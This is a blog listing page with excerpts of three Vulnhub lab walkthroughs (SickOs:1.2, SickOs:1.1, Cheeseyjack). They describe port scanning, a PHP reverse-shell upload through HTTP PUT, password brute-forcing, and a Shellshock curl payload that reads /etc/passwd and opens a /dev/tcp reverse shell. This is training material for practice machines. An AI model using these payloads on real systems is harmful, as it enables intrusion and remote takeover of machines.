Posts

SickOs:1.2 - Walkthrough [Vulnhub]

Here's my solution for SickOs:1.2. The machine can be downloaded from here. Port Scanning: Using nmap to scan all TCP ports. $ nmap -sC -sV -p- 192.168.1.102 We find 2 ports open. Enumeration: Browsing the web. Using dirb to scan directories. $ dirb http://192.168.1.102 -r Interesting, let's browse the /test directory. We check for HTTP methods. Interesting. We find that the PUT method is allowed, so we can easily upload the shell. Before uploading the PHP reverse shell file, we first edit the listening IP and set the listening port number to 443. Let's upload the shell. $ curl -v --upload-file shell.php http://192.168.1.102/test/ -0 We have successfully uploaded the shell. Initial Access: Now to run the exploit we simply click the shell file, and on the other side we start the netcat listener. We get the reverse shell. Privilege Escalation: We check the cron directories; it seems that chkrootkit runs daily. $ ls -la /etc/cron* We check the version. We search for the exploit and we find one. $ se...

SickOs:1.1 - Walkthrough [Vulnhub]

Here's my solution for SickOs:1.1. The machine can be downloaded from here. Port Scanning: Using nmap to scan all TCP ports. $ nmap -Pn -sC -sV -p- 192.168.1.107 We find 2 ports open. Enumeration: Before browsing the web we first set the proxy. Now let's browse the web. Using dirb to scan directories. $ dirb http://192.168.1.107 -p 192.168.1.107:3128 Further scanning the /cgi-bin directory. $ dirb http://192.168.1.107/cgi-bin/ -p 192.168.1.107:3128 Browsing /status. Initial Access: Trying for Shellshock. $ curl --proxy http://192.168.1.107:3128 -H "user-agent: () { :; }; echo; echo; /bin/sh -c 'cat /etc/passwd'" http://192.168.1.107/cgi-bin/status This seems to be working fine. Let's get the shell. $ curl --proxy http://192.168.1.107:3128 -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.108/1234 0>&1'" http://192.168.1.107/cgi-bin/status We get the shell. Privilege Escalation: From www-data > sickos. We...

Cheesey:Cheeseyjack - Walkthrough [Vulnhub]

Here's my solution for Cheesey:Cheeseyjack. The machine can be downloaded from here. Port Scanning: Using Nmap to scan all TCP ports. $ nmap -sC -sV -p- 192.168.1.106 We find 11 ports open. Enumeration: Browsing the web. Using dirb to scan the directories. $ dirb http://192.168.1.106 -r Browsing /it_security. Let's check this note.txt. From this message, we can take note of the names: cheese and crab can be user names. Browsing /project_management. Interesting, a login page. Since SMB ports are open, we run enum4linux against the host to find some useful information. $ enum4linux -a 192.168.1.106 Interesting. We find 2 users: ch33sem4n and crab. The author has already given us the hint: cewl. We use cewl to generate passwords for us. $ cewl http://192.168.1.106/project_management > password We use Burp to brute force the password of the user ch33s3m4n. We get the password: qdpm. We browse the login page and log in with the credential: Email: ch33s3m4n@cheeseyj...